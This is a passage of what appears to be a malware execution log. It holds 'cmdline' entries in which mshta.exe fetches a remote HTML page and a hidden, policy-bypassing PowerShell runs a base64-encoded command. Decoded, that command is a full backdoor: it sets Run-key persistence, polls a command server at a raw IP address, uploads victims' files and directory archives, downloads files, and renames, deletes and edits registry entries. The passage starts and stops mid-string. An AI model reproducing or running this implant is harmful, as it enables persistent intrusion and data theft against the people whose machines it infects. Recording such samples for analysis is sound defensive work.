EMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAwAF0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHIAZQBuAGEAbQBlADoAJwApACkAewAkAFEAQgBpAGEAPQAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBTAHUAYgBTAHQAcgBpAG4AZwAoADcAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAUQBCAGkAYQAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAzACkAewBSAGUAbgBhAG0AZQAtAEkAdABlAG0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAWABUAGwAbAAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFUAbABVAG0ATAAgACQAWgBaAFMAWgBkAGIAdQBOAFIATwB1ACAAJABYAFQAbABsADsAfQB9AGkAZgAgACgAJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAGUAbAA6ACcAKQApAHsAJABRAEIAaQBhAD0AJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA0ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABRAEIAaQBhACkAewBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAFEAQgBpAGEAOwAkAFgAVABsAGwAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAWABUAGwAbAA7AH0AfQB9AH0AfQAgAEMAYQB0AGMAaAB7AH0AUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AdwBoAGkAbABlACgAJAB0AHIAdQBlACAALQBlAHEAIAAkAHQAcgB1AGUAKQA=
cmdline	mshta.exe http://bian0151.cafe24.com/member/1.html
cmdline	"C:\Windows\System32\mshta.exe" http://bian0151.cafe24.com/member/1.html
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAOAA1ADsAJABPAGsAUwBEAEwAbABXAGMAVgBmAG4AcQBvAG8AIAA9ACAAMQAwADIANAAgACoAIAAxADAAMgA0ADsAJABvAHUAawBjAHYAVQBGAFAAaAAgAD0AIAAkAGUAbgB2ADoAQwBPAE0AUABVAFQARQBSAE4AQQBNAEUAIAArACAAJwAtACcAIAArACAAJABlAG4AdgA6AFUAUwBFAFIATgBBAE0ARQA7ACQAWgBaAFMAWgBkAGIAdQBOAFIATwB1ACAAPQAgACcAaAB0AHQAcAA6AC8ALwA3ADUALgAxADEAOQAuADEAMwA2AC4AMgAwADcALwBjAG8AbgBmAGkAZwAvAGIAYQBzAGUAcwAvAGMAbwBuAGYAaQBnAC4AcABoAHAAJwAgACsAIAAnAD8AVQA9ACcAIAArACAAJABvAHUAawBjAHYAVQBGAFAAaAA7ACQAeQB5AFUAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcAGcAWQBOAEMAcQBDAFEAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB5AHkAVQApACkAIAB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAgAC0ATgBhAG0AZQAgAG0ATwBUAEMASwBkACAALQBWAGEAbAB1AGUAIAAnAGMAOgBcAHcAaQBuAGQAbwB3AHMAXABzAHkAcwB0AGUAbQAzADIAXABjAG0AZAAuAGUAeABlACAALwBjACAAUABvAHcAZQByAFMAaABlAGwAbAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0ATgBvAEwAbwBnAG8AIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0AZQBwACAAYgB5AHAAYQBzAHMAIABwAGkAbgBnACAALQBuACAAMQAgAC0AdwAgADUANgAzADkANAAyACAAMgAuADIALgAyAC4AMgAgAHwAfAAgAG0AcwBoAHQAYQAgAGgAdAB0AHAAOgAvAC8ANwA1AC4AMQAxADkALgAxADMANgAuADIAMAA3AC8AYwBvAG4AZgBpAGcALwBiAGEAcwBlAHMALwAxAC4AaAB0AG0AbAAnACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUAOwB9AGYAdQBuAGMAdABpAG8AbgAgAFUAbABVAG0ATAAoACQAQwBzAEQAdAAsACAAJABXAFoAaABsAHYAbQBJAGQAbgApAHsAJABDAGYAcwBXAEkARQBuAE8ASQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAFcAWgBoAGwAdgBtAEkAZABuACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAbgBGAFoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACQAQwBzAEQAdAApADsAJABuAEYAWgAuAE0AZQB0AGgAbwBkACAAPQAgACcAUABPAFMAVAAnADsAJABuAEYAWgAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcAOwAkAG4ARgBaAC4AQwBvAG4AdABlAG4AdABMAGUAbgBnAHQAaAAgAD0AIAAkAEMAZgBzAFcASQBFAG4ATwBJAHIALgBMAGUAbgBnAHQAaAA7ACQAeQB5AFUAVQAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkAOwAkAHkAeQBVAFUALgBXAHIAaQB0AGUAKAAkAEMAZgBzAFcASQBFAG4ATwBJAHIALAAgADAALAAgACQAQwBmAHMAVwBJAEUAbgBPAEkAcgAuAEwAZQBuAGcAdABoACkAOwAkAHkAeQBVAFUALgBGAGwAdQBzAGgAKAApADsAJAB5AHkAVQBVAC4AQwBsAG8AcwBlACgAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHMAcABvAG4AcwBlAF0AIAAkAEkATgBmAHEAZwAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUwBnAHUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAEkATgBmAHEAZwAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAeQB5AFUAVQBMAFQAIAA9ACAAJABTAGcAdQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AHIAZQB0AHUAcgBuACAAJAB5AHkAVQBVAEwAVAA7AH0AZgB1AG4AYwB0AGkAbwBuACAAQgBhAGkAVQBIAFUAUQBiAHoAUQBKAEEAcwAoACQAQwBzAEQAdAAsACAAJABmAHIAUgBZAG0AdwBiAHcALAAgACQAeABkAEgASwBEAHYARgBNACwAIAAkAEMATgBHAG4AdwBXACkAewAkAFQAaQBtAGUAbwB1AHQAPQAxADAAMAAwADAAMAAwADAAOwAkAEMAUgBMAEYAIAA9ACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMABEACkAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMABBACkAOwAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAA9ACAAJwAtAC0AJwA7ACQAQgBvAHUAbgBkAGEAcgB5ACAAPQAgACcAKgAqACoAKgAqACcAOwAkAHMAdAByAGUAYQBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AE8AcABlAG4AUgBlAGEAZAAoACQAZgByAFIAWQBtAHcAYgB3ACkAOwAkAGcAQgBGAHYAUABnAGIAWgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAYgB5AHQAZQBbAF0AIAAkAE8AawBTAEQATABsAFcAYwBWAGYAbgBxAG8AbwA7AHcAaABpAGwAZQAoACAAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAZwBCAEYAdgBQAGcAYgBaACwAMAAsACQATwBrAFMARABMAGwAVwBjAFYAZgBuAHEAbwBvACkAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABuAEYAWgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJABDAHMARAB0ACkAOwAkAG4ARgBaAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAG4ARgBaAC4AVABpAG0AZQBvAHUAdAAgAD0AIAAkAFQAaQBtAGUAbwB1AHQAOwAkAG4ARgBaAC4AQwBvAG4AdABlAG4AdABUAHkAcABlACAAPQAgACcAbQB1AGwAdABpAHAAYQByAHQALwBmAG8AcgBtAC0AZABhAHQAYQA7AGIAbwB1AG4AZABhAHIAeQA9ACcAIAArACAAJABCAG8AdQBuAGQAYQByAHkAOwAkAHkAeQBVAFUAIAA9ACAAJABuAEYAWgAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABoAGUAYQBkAGkAbgBnADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAxACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMQAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcAMgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBDAG8AbgB0AGUAbgB0AC0ARABpAHMAcABvAHMAaQB0AGkAbwBuADoAIABmAG8AcgBtAC0AZABhAHQAYQA7ACAAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJAB4AGQASABLAEQAdgBGAE0AIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABDAE4ARwBuAHcAVwAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAyADIAKQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAyACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMgAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcAMwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABDAFIATABGACkAOwAkAHkAeQBVAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJAB5AHkAVQBVAC4AVwByAGkAdABlACgAJABnAEIARgB2AFAAZwBiAFoALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAzACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMwAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcANAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAKwAgACQAQgBvAHUAbgBkAGEAcgB5ACAAKwAgACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwA0ACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcANAAuAEwAZQBuAGcAdABoACkAOwAkAHkAeQBVAFUALgBGAGwAdQBzAGgAKAApADsAJAB5AHkAVQBVAC4AQwBsAG8AcwBlACgAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHMAcABvAG4AcwBlAF0AIAAkAEkATgBmAHEAZwAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUwBnAHUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAEkATgBmAHEAZwAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAeQB5AFUAVQBMAFQAIAA9ACAAJABTAGcAdQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0AJABzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwB9AGYAdQBuAGMAdABpAG8AbgAgAHcAWQBsAGIAZABoAFUARgBEAGwAcgAoACQAQwBzAEQAdAAsACAAJABmAHIAUgBZAG0AdwBiAHcAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABSAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAcwBEAHQAKQA7ACQAUgBlAHEAdQBlAHMAdAAuAHMAZQB0AF8AVABpAG0AZQBvAHUAdAAoADEANQAwADAAMAApADsAJABSAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABSAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAUwBwAGwAaQB0AFMAaQB6AGUAIAA9ACAAMQAwADIANAA7ACQAQgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAQgB5AHQAZQBbAF0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABTAHAAbABpAHQAUwBpAHoAZQA7AFQAcgB5ACAAewBEAG8AIAB7ACQAQwBvAHUAbgB0ACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAKQA7ACQAbwBmAGYAcwBlAHQAIAA9ACAAJABDAG8AdQBuAHQAIAAtACAAMQA7AEEAZABkAC0AQwBvAG4AdABlAG4AdAAgACQAZgByAFIAWQBtAHcAYgB3ACAAJABCAHUAZgBmAGUAcgBbADAALgAuACQAbwBmAGYAcwBlAHQAXQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQgB5AHQAZQA7AH0AIABVAG4AdABpAGwAKAAkAEMAbwB1AG4AdAAgAC0AZQBxACAAMAApAH0AIABDAGEAdABjAGgAIAB7AH0AIABGAGkAbgBhAGwAbAB5ACAAewAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAEQAaQBzAHAAbwBzAGUAKAApADsAfQB9AGQAbwB7AFQAcgB5AHsAJABKAE4AZgAgAD0AIABVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACcAJwA7AEkAZgAgACgAJABKAE4AZgAgAC0AbgBlACAAJwBuAHUAbABsACcAIAAtAGEAbgBkACAAJABKAE4AZgAgAC0AbgBlACAAJwAnACkAewAkAEoATgBmAD0AJABKAE4AZgAuAFMAdQBiAFMAdAByAGkAbgBnACgAMQAsACAAJABKAE4AZgAuAEwAZQBuAGcAdABoACAALQAgADIAKQA7ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABKAE4AZgApACkAOwBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgApAHsAaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAaQBuAGYAbwA6ACcAKQApAHsAJABRAEIAaQBhAD0AJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA5ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABRAEIAaQBhACkAewAkAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAHkAeQBVACAAKwAgACcALgBjAHMAdgAnADsARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAUQBCAGkAYQAgAC0ARgBpAGwAdABlAHIAIAAqAC4AKgAgAC0AUgBlAGMAdQByAHMAZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAATgBhAG0AZQAsACAATABlAG4AZwB0AGgALAAgAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUALAAgAEYAdQBsAGwAbgBhAG0AZQAgAHwAIABFAHgAcABvAHIAdAAtAEMAcwB2ACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQAgAC0ATgBvAFQAeQBwAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIAB1AHQAZgA4ADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQBpAG4AZgBvACcAOwBCAGEAaQBVAEgAVQBRAGIAegBRAEoAQQBzACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZABpAHIAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAUQBCAGkAYQApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJAB5AHkAVQAgACsAIAAnAC4AegBpAHAAJwA7AEMAbwBtAHAAcgBlAHMAcwAtAEEAcgBjAGgAaQB2AGUAIAAkAFEAQgBpAGEAIAAkAGYAaQBsAGUAbgBhAG0AZQAgAC0ARgBvAHIAYwBlADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZABpAHIAJwA7AEIAYQBpAFUASABVAFEAYgB6AFEASgBBAHMAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAZgBpAGwAZQBuAGEAbQBlACAAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlADsAfQB9AGkAZgAgACgAJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AQwBvAG4AdABhAGkAbgBzACgAJwBmAGkAbABlADoAJwApACkAewAkAFEAQgBpAGEAPQAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAFEAQgBpAGEAKQB7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGYAaQBsAGUAJwA7AEIAYQBpAFUASABVAFEAYgB6AFEASgBBAHMAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAUQBCAGkAYQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAbwB3AG4AOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AHcAWQBsAGIAZABoAFUARgBEAGwAcgAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAwAF0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHIAZQBnAGUAZABpAHQAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgAOAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBOAGEAbQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQAgAC0AVgBhAGwAdQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIA